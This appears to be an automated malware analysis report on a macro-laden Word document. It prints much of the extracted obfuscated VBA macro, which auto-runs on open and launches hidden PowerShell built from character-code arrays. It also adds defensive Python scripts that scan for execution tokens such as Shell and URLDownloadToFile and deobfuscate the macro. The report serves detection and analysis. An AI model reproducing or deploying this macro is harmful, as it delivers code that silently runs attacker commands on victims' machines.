Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 911ced38e91795d3…

MALICIOUS

Office (OLE)

Size: 98.5 KB | Created: 2018-06-13 10:46:00 | Authoring application: Microsoft Office Word | First seen: 2020-02-04
MD5: 0c936dc389a7ed84932b14327b054e94 | SHA-1: 5fee27f8f8f7264a6775810e1fa5603f72888556 | SHA-256: 911ced38e91795d375ff888acdf91055a240bd80ec36690ef9b10648908a77ca
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter; T1059.005 Visual Basic; T1204.002 Malicious File

The sample is a Word document carrying a VBA macro. Its auto-executing 'Document_open' handler calls 'rhYNBK()', which invokes 'VBA.Shell()'. The window-style argument is '44867 - 44867', i.e. 0 (vbHide), so the spawned process runs without a visible window. The command string is assembled at run time: 'Chr(wjhjjrfIK + vbKeyP + issVRHHzn)' evaluates to "P" (the two undeclared operands are Empty, which is 0 in arithmetic under 'On Error Resume Next', and vbKeyP is 80), and it is concatenated with "owers" and the return value of 'qXtOWCw()', whose string fragments begin "HeLL  [strInG]::JoIN('',([cHar[]] (41,107, ...". The Shell() call therefore launches PowerShell with a command built from character-code arrays. Stagers of this kind commonly fetch and run a second-stage payload, but the extracted source is truncated in this report, so the rest of the command and its effect cannot be confirmed from the page. The finding is consistent with the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics and with the ClamAV detection name 'Doc.Malware.Valyria-7012661-0'. The arithmetic on undefined variables ('CDbl', 'Tan', 'Rnd', 'Log') that surrounds every meaningful statement is obfuscation padding with no effect on execution.

Heuristics 6

  • ClamAV: Doc.Malware.Valyria-7012661-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-7012661-0
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The macro source calls Shell(), which starts an external process with the command string it is given.
  • Document_Open macro high OLE_VBA_DOCOPEN
    A Document_Open handler runs automatically as soon as the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main in document text (OLE body). This is the standard DrawingML XML namespace present in any Office document that contains drawing content; it is not an indicator of compromise.
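The three macro heuristics above (auto-exec entry point, Shell() call, and the combination of both in a stream where no source may be recoverable) can be reproduced with a small token scanner. The following is an added example written for this report, not the analysis engine that produced it; the sample inputs are constructed (the first from the extracted macro shown further down, the second a stand-in for a cache/p-code stream), and the byte-level scan is an approximation: real p-code keeps identifiers in a separate dictionary, and a tool such as pcodedmp is needed to disassemble it properly.

```python
"""Static VBA triage in the spirit of the report's OLE_VBA_DOCOPEN,
OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics (added example)."""
import re

# Entry points Office runs as soon as macros are enabled.
AUTOEXEC_TOKENS = (
    "Document_Open", "Document_Close", "AutoOpen", "AutoClose", "AutoExec",
    "Auto_Open", "Workbook_Open", "Workbook_Close",
)
# Tokens that hand control to the OS, the network or another COM object.
# "WScript.Shell" is already covered by CreateObject, so the bare Shell()
# rule excludes it to avoid double counting.
EXEC_TOKENS = {
    "Shell": r"(?<!WScript\.)\bShell\b",
    "CreateObject": r"\bCreateObject\b",
    "GetObject": r"\bGetObject\b",
    "URLDownloadToFile": r"URLDownloadToFile",
    "XMLHTTP": r"XMLHTTP",
    "ShellExecute": r"ShellExecute",
}


def scan_tokens(blob: bytes):
    """Return (autoexec_hits, exec_hits) for decoded source or a raw stream.

    latin-1 is byte-transparent, so identifiers that survive as ASCII inside a
    binary VBA/cache stream are matched even when no source was recovered.
    """
    text = blob.decode("latin-1")
    auto = [t for t in AUTOEXEC_TOKENS if re.search(r"\b" + t + r"\b", text, re.I)]
    exe = [n for n, pat in EXEC_TOKENS.items() if re.search(pat, text, re.I)]
    return auto, exe


def triage(blob: bytes) -> dict:
    """Map the report's heuristic names to severity and the tokens that fired."""
    auto, exe = scan_tokens(blob)
    findings = {}
    if "Document_Open" in auto:
        findings["OLE_VBA_DOCOPEN"] = {"severity": "high", "tokens": ["Document_Open"]}
    if "Shell" in exe:
        findings["OLE_VBA_SHELL"] = {"severity": "critical", "tokens": ["Shell"]}
    if auto and exe:  # auto-exec entry point AND something that executes/downloads
        findings["OLE_VBA_PCODE_AUTOEXEC_EXEC"] = {"severity": "high", "tokens": auto + exe}
    return findings


# Constructed from the macro shown in this report, trimmed to the relevant lines.
SAMPLE_SOURCE = b'''Private Sub Document_open()
On Error Resume Next
rhYNBK
End Sub
Function rhYNBK()
rhYNBK = QCiFOwRb + VBA.Shell(FwEhjzFZdKT + Chr(wjhjjrfIK + vbKeyP + issVRHHzn) + "owers", 44867 - 44867)
End Function
'''
# Constructed stand-in for a cache/p-code stream with no recoverable source:
# identifiers survive as ASCII between binary bytes.
SAMPLE_STREAM = b"\x00\x01\x00Document_Open\x00\x00\x16\x3aShell\x00\x00\x0cCreateObject\x00"
# Constructed benign macro: an auto-exec entry point but no execution token.
SAMPLE_BENIGN = b'Private Sub Document_Open()\nActiveDocument.Range.InsertAfter "reviewed"\nEnd Sub\n'

if __name__ == "__main__":
    for name, blob in (("source", SAMPLE_SOURCE), ("stream", SAMPLE_STREAM), ("benign", SAMPLE_BENIGN)):
        print(name, "->", sorted(triage(blob)))
```

The benign case shows why the combined heuristic matters: a Document_Open handler on its own is only a medium-confidence signal, while an entry point plus an execution token in the same stream is what the report scores as high.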

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15213 bytes
SHA-256: 9019bd1f0f7945b859b6086dac510f7e60a503f69feefe7f20fbb91f1a56d500
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "kwHfCEUccaz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function rhYNBK()
On Error Resume Next
ljoFI = AVuXsZ
hXQnXb = CDbl(iUWJG * CDbl(BPPfr + Int(pNjTN * Rnd(12432)) * EzDcF * Log(81793 * irsBqh - ojRNfw + Fix(51))))
AECjNX = CDbl(fsQSId)
WNoJO = iPGiH
YPSiFY = Tan(27506)
jkFPjj = Tan(69553)
ArozJ = ZNDZw
pSXOs = CDbl(WRjDlz * CDbl(ZzzMh + Int(qIucSi * Rnd(27517)) * ponapJ * Log(41436 * vAAFm - sizFq + Fix(51))))
upEfi = CDbl(hdwdvo)
HDwLcs = QQfMsk
XOzNZ = Tan(19218)
kUaBWu = Tan(11677)
GvUbr = OiUJB
dRbpuB = CDbl(niKrn * CDbl(BMPKYA + Int(hkwCrB * Rnd(2441)) * BiKCq * Log(10159 * CmvJt - iswEhh + Fix(51))))
UYwtAz = CDbl(wzowok)
cPOGA = sAwJT
UOlEvD = Tan(34080)
IzXvJP = Tan(94655)
YiNzQ = ltwzPl
FwXIjD = CDbl(uzUZp * CDbl(ppjlj + Int(VjLbPR * Rnd(96444)) * OKwDj * Log(45685 * FLiCiq - NYNnI + Fix(51))))
uWHqi = CDbl(BjDQqR)
jiEiAF = SmNbJ
JCLPt = Tan(51870)
DwJKNT = Tan(31777)
rhYNBK = QCiFOwRb + VBA.Shell(FwEhjzFZdKT + Chr(wjhjjrfIK + vbKeyP + issVRHHzn) + "owers" + qXtOWCw + Hzbqr + jLuoAHMdDE + YocYAQYHu + UQAAXqjsjC, 44867 - 44867)
PKoXM = AKiVz
qtTRFc = CDbl(NGtII * CDbl(jbfijS + Int(ZKiZqh * Rnd(42388)) * EzoRQ * Log(58056 * NpAvI - CAWCfq + Fix(51))))
KubXGL = CDbl(HEqrC)
OqhnJ = XJMWKq
JSAlq = Tan(31572)
YUbuDW = Tan(45198)
CuZXCR = tRLnoS
iuGtZ = CDbl(WwYRj * CDbl(kYjKc + Int(vaMvIP * Rnd(13839)) * dQuKWC * Log(46592 * FdnUV - PDWIq + Fix(51))))
wjmqmu = CDbl(GENui)
TTFXIb = LIYzZV
bkXuNu = Tan(12864)
hVKHiq = Tan(86584)
End Function
Private Sub Document_open()
On Error Resume Next
Vrwha = JzJNMu
CEjZO = CDbl(jpLmR * CDbl(zPAQl + Int(VKAzN * Rnd(51887)) * BGBJPm * Log(24853 * jFBDBR - AdKFi + Fix(51))))
jMEqIw = CDbl(zijwz)
qNKzN = zQKXnI
HFnbfJ = Tan(63439)
dSIiX = Tan(96747)
sWAKu = DHWwO
ZZPII = CDbl(oAaYp * CDbl(iMnpK + Int(GELiwr * Rnd(19772)) * SjuIna * Log(48034 * WlIfk - DnwTh + Fix(51))))
urbYw = CDbl(CHGRl)
sfpCj = AABXmi
LYntar = Tan(77484)
chPOzl = Tan(82153)
rhYNBK
kPIfJ = hQCvhi
SqwsNh = CDbl(kpIXE * CDbl(OWGRra + Int(iidXK * Rnd(86109)) * zjwFpH * Log(93513 * lQsCzr - uHlaM + Fix(51))))
oMZhUk = CDbl(BrChz)
XlpYo = PQjVlj
bNlQf = Tan(20206)
KKlEH = Tan(44225)
CYrKiM = QCFDd
zZVMP = CDbl(HiErnw * CDbl(IhciAz + Int(DVMwN * Rnd(12039)) * tAhQi * Log(12016 * iNDzl - dOzhD + Fix(51))))
RJbNW = CDbl(JNOiXa)
sUiTY = PuipXf
cnYMBi = Tan(70964)
tDpoX = Tan(8311)
End Sub


Attribute VB_Name = "BMMELJMdoKDAjA"
Function qXtOWCw()
On Error Resume Next
uNFmYJ = CDbl(wQXrM)
VMdjKL = Tan(656)
YcdmQ = CDbl(oXSjs * CDbl(IEFEZw + Int(zNLXqO * Rnd(13555)) * rHupj * Log(23903 * HsjqS - WcwKEK + Fix(51))))
RSNVB = Tan(85617)
vwMUif = clPNl
rzzZV = Ruzjs
sBkGCrsZHX = "HeLL " + " [strInG]::JoIN" + "('',([cHar[]]" + " (41,107, 89,11" + "1 ,76 , 88," + " 70, 45 " + ", 48,45 ,9" + "9,1" + "04 ,122 ,32,9"
ZtSjT = CDbl(zQNkH)
qzYuZ = Tan(76227)
iVUFsm = CDbl(pQJzs * CDbl(UTLYV + Int(EYIbCZ * Rnd(46630)) * WYCYq * Log(89340 * VVcSCm - wDKwu + Fix(51))))
zqTBqa = Tan(27562)
IzwiFT = maFRF
TTunwS = iZMYS
maDtMKm = "8 ,111,103, " + "10" + "4 , 11" + "0,121 " + ",45 , 127," + "108, 99 ,105," + " 98,9" + "6, 54" + ", 41,79,119,"
ziEvU = CDbl(dmSHA)
dSjEAi = Tan(31094)
mwrlwX = CDbl(bsUcM * CDbl(qDSLM + Int(rRiDW * Rnd(45619)) * kwTsQ * Log(82792 * iqToT - KBEhb + Fix(51))))
zlrMzW = Tan(55076)
lvTAk = rIrpNB
ZvbKmi = Sipap
lbtCM = "123 ,110, 66" + ", 45 , 48" + " ,4" + "5, " + "99," + " 10"
BFtYC = CDbl(PKsnMC)
YZhtjU = Tan(41638)
MBRrb = CDbl(iUjIR * CDbl(Swnvt + Int(niQSdP * Rnd(27120)) * KmjTF * Log(33464 * FMXQB - zqSnK + Fix(51))))
jFXRfi = Tan(2959)
iMjQfs = onzfS
TSDmYT = bXjwj
ddaEwYs = "4 ,122" + ", 32 ,98" + ", 111," + "103," + "104 ," + "110 , 1" + "21,45 " + ",94 , 116,126" + ",121 ,10" + "4, 96"
EJvkfX = CDbl(iSuUYp)
iGnUBp = Tan(7946)
mAsnB = CDbl(mbUNH * CDbl(GYwIX + Int(mWwrP * Rnd(2502
... (truncated)
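The extract above shows the obfuscation pattern end to end: padding statements ('CDbl', 'Tan', bare copies of undefined names), a Shell() argument assembled from 'Chr()' and string fragments, and a PowerShell payload that joins a '[char[]]' array. The script below unwinds those layers. It is an added example, not the report's engine nor the sample author's code; its input is constructed from the fragments visible on this page, and because the extract is truncated before 'qXtOWCw()' returns, the sample assumes the four fragments are returned in source order. It relies on two VBA facts: under 'On Error Resume Next' an undeclared name is Empty (0 in arithmetic, "" in concatenation), and vbKeyA..vbKeyZ equal ASCII 65..90.

```python
"""Unwind the Chr()/fragment/char-array obfuscation in this sample's macro (added example)."""
import re

VBKEYS = {f"vbkey{c}": ord(c.upper()) for c in "abcdefghijklmnopqrstuvwxyz"}

# Constructed from the fragments visible in the report's extract. The last line
# of qXtOWCw() is NOT on the page; it is an assumed return in source order.
SAMPLE_VBA = r'''
Function rhYNBK()
On Error Resume Next
hXQnXb = CDbl(iUWJG * CDbl(BPPfr + Int(pNjTN * Rnd(12432)) * EzDcF))
YPSiFY = Tan(27506)
rhYNBK = QCiFOwRb + VBA.Shell(FwEhjzFZdKT + Chr(wjhjjrfIK + vbKeyP + issVRHHzn) + "owers" + qXtOWCw + Hzbqr, 44867 - 44867)
End Function
Function qXtOWCw()
On Error Resume Next
vwMUif = clPNl
sBkGCrsZHX = "HeLL " + " [strInG]::JoIN" + "('',([cHar[]]" + " (41,107, 89,11" + "1 ,76 , 88," + " 70, 45 " + ", 48,45 ,9" + "9,1" + "04 ,122 ,32,9"
maDtMKm = "8 ,111,103, " + "10" + "4 , 11" + "0,121 " + ",45 , 127," + "108, 99 ,105," + " 98,9" + "6, 54" + ", 41,79,119,"
lbtCM = "123 ,110, 66" + ", 45 , 48" + " ,4" + "5, " + "99," + " 10"
ddaEwYs = "4 ,122" + ", 32 ,98" + ", 111," + "103," + "104 ," + "110 , 1" + "21,45 " + ",94 , 116,126" + ",121 ,10" + "4, 96"
qXtOWCw = sBkGCrsZHX + maDtMKm + lbtCM + ddaEwYs
End Function
'''

FUNC_RE = re.compile(r"(?:Private\s+)?(?:Function|Sub)\s+\w+\s*\(\)(.*?)End\s+(?:Function|Sub)", re.S | re.I)
ASSIGN_RE = re.compile(r"\s*(\w+)\s*=\s*(.+?)\s*$")
# Padding: arithmetic on undefined names, Tan(n), or a bare copy of another name.
JUNK_RE = re.compile(r"^\s*\w+\s*=\s*(?:CDbl\(|Tan\(|\w+\s*$)")
SHELL_RE = re.compile(r"\bShell\s*\(", re.I)


def split_top(s, sep):
    """Split on sep at parenthesis depth 0, ignoring anything inside "..."."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in s:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            depth += (ch == "(") - (ch == ")")
            if ch == sep and depth == 0:
                parts.append("".join(cur)); cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def eval_arith(expr):
    """Integer +/- chain; names resolve to vbKey constants, or Empty (0)."""
    total, sign = 0, 1
    for tok in re.findall(r"[+-]|\w+", expr):
        if tok in "+-":
            sign = -1 if tok == "-" else 1
        else:
            total += sign * (int(tok) if tok.isdigit() else VBKEYS.get(tok.lower(), 0))
            sign = 1
    return total


def eval_expr(expr, env):
    """Evaluate a `+` chain of string literals, Chr(...) calls and names."""
    out = []
    for term in (t.strip() for t in split_top(expr, "+")):
        if term.startswith('"'):
            out.append(term[1:-1].replace('""', '"'))
        elif re.match(r"chr\s*\(", term, re.I):
            out.append(chr(eval_arith(term[term.index("(") + 1:term.rindex(")")])))
        else:
            out.append(env.get(term.lower(), ""))  # undeclared name -> Empty -> ""
    return "".join(out)


def resolve_macro(src):
    """Drop padding, evaluate the remaining assignments, and return
    (env, (command, window_style)) for the Shell() call, or (env, None)."""
    stmts = [(m.group(1).lower(), m.group(2)) for body in FUNC_RE.findall(src)
             for line in body.splitlines()
             if (m := ASSIGN_RE.match(line)) and not JUNK_RE.match(line)]
    env, shell = {}, None
    for _ in range(2):  # second pass resolves a routine defined later in the file
        for lhs, rhs in stmts:
            if not SHELL_RE.search(rhs):
                env[lhs] = eval_expr(rhs, env)
    for _, rhs in stmts:
        if sm := SHELL_RE.search(rhs):
            args = split_top(rhs[sm.end():rhs.rindex(")")], ",")
            win = eval_arith(args[1]) if len(args) > 1 else 1  # Shell default: vbNormalFocus
            shell = (eval_expr(args[0], env), win)
    return env, shell


def decode_char_arrays(ps_cmd):
    """Join each PowerShell `[char[]] (n, n, ...)` literal back into text."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", m))
            for m in re.findall(r"\[char\[\]\]\s*\(([\d\s,]+)", ps_cmd, re.I)]


def deobfuscate(src):
    _, shell = resolve_macro(src)
    if shell is None:
        return None
    cmd, win = shell
    return {"command": cmd, "window_style": win, "char_layers": decode_char_arrays(cmd)}


if __name__ == "__main__":
    r = deobfuscate(SAMPLE_VBA)
    print("Shell command:", r["command"])
    print("window style :", r["window_style"], "(0 = vbHide)")
    for layer in r["char_layers"]:
        print("char[] layer :", repr(layer))
```

On the fragments visible here the Shell command resolves to "PowersHeLL  [strInG]::JoIN('',([cHar[]] (41,107, ..." with window style 0, and the joined character array is a further non-printable layer rather than readable PowerShell, so the next stage would have to be recovered by running the full command in a sandbox or from the untruncated macro.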